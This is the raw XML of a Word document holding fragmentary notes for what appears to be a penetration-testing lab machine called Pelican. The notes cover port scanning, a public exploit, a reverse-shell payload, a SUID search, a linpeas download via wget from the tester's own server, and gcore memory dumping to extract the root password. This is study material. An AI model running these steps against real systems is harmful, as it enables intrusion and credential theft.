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6D6A071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F81C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pelican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B5224D1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F81C2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81C21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F81C21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F81C21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F81C21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F81C21">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sV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4CFEB199" w:rsidR="00843DCE" w:rsidRDefault="00E7301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sV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port_number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more info of that port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F72D72" w14:textId="4EFD1B02" w:rsidR="00843DCE" w:rsidRDefault="00440CC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DB5FB8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/ -N = anonymous login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6287F3FD" w14:textId="40736213" w:rsidR="00003580" w:rsidRDefault="0000358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anonymoud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’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3051DE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> =no access shows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F38C76" w14:textId="6F0D228B" w:rsidR="003051DE" w:rsidRDefault="003051D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the website shows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12353DF" w14:textId="24940055" w:rsidR="003051DE" w:rsidRDefault="003051D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exhibitor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zoochekepr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exploit</w:t>
      </w:r>
      <w:r w:rsidR="00884D2F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00884D2F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exploitdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="75A6643D" w14:textId="77777777" w:rsidR="00E7301F" w:rsidRDefault="00E7301F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750D6EB7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click on {} = the instructions are mentions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5D5C3E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bash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from shell generator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA87071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website open config =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java.env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script enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67EE888C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$(paste)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44F95979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not then run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rlwrap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2CEA3F0A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commit = we obtain the shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3181326F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take ss then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hostename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id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then click ss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ACE4334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find / -perm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u+s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2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F51607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suid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exploit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GTFOBins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65AF95D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like we have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agentty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then we can just write that and obtain reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1D3110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we see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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/bin/password-store</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F00935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linpeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589DFA4A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http.server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3F97C006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at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tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3BAE8989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wget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4" w:history="1">
        <w:r w:rsidRPr="002A64DA">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>http://out_ip:8000/linepeas.sh -o linepeas.sh</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="31DF2111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+x lineapeas.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="580449EA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./linepeas.sh &gt; peas.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37946D73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peas.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5437ADA4" w14:textId="77777777" w:rsidR="00005C1C" w:rsidRDefault="00005C1C" w:rsidP="00005C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obtain = and we know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A74E846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= obtain the path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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/bin/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gcore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="41FF8605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gtfobin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gcore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we obtain =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2C53753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want the PID so </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E825E5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shell </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F02AB9D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-aux = here we obtain PID for all = now just find for password-stored which is obtain </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247EACAF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gcore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484 = here we see saved at core.484</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB378C9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core.484</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422D8E3C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find root: password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B67E1E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not then run </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C113B70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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/bin/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gcore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484</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C21F8CC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core.484 here we find the password of the root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E52A465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03797AF5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root = with that password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666EA852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/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3C4F25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bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB513DC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id = its root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC7BB74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cd /root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6F5DDC" w14:textId="77777777" w:rsidR="002F3421" w:rsidRDefault="002F3421" w:rsidP="002F342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proof.txt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028BDDCF" w:rsidR="00A311DF" w:rsidRPr="00843DCE" w:rsidRDefault="002F34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here we obtain proof.txt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3580"/>
    <w:rsid w:val="00005C1C"/>
    <w:rsid w:val="000C3180"/>
    <w:rsid w:val="000E5D61"/>
    <w:rsid w:val="00126F89"/>
    <w:rsid w:val="00190DC7"/>
    <w:rsid w:val="00261BFF"/>
    <w:rsid w:val="00287A36"/>
    <w:rsid w:val="002F3421"/>
    <w:rsid w:val="003051DE"/>
    <w:rsid w:val="003D4140"/>
    <w:rsid w:val="00427E37"/>
    <w:rsid w:val="00440CC0"/>
    <w:rsid w:val="00454CCA"/>
    <w:rsid w:val="005023BE"/>
    <w:rsid w:val="00570375"/>
    <w:rsid w:val="006E40CE"/>
    <w:rsid w:val="00843DCE"/>
    <w:rsid w:val="00884D2F"/>
    <w:rsid w:val="00910CCE"/>
    <w:rsid w:val="00A27166"/>
    <w:rsid w:val="00A311DF"/>
    <w:rsid w:val="00A5666B"/>
    <w:rsid w:val="00AA36D3"/>
    <w:rsid w:val="00CE6AFB"/>
    <w:rsid w:val="00CF503C"/>
    <w:rsid w:val="00D71E1F"/>
    <w:rsid w:val="00D900BD"/>
    <w:rsid w:val="00DB5FB8"/>
    <w:rsid w:val="00E42B6C"/>
    <w:rsid w:val="00E7301F"/>
    <w:rsid w:val="00EA2B90"/>
    <w:rsid w:val="00F578D1"/>
    <w:rsid w:val="00F81C21"/>
    <w:rsid w:val="00FD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out_ip:8000/linepeas.sh%20-o%20linepeas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27</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-25T12:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-30T16:11:00Z</dcterms:modified>
</cp:coreProperties>
</file>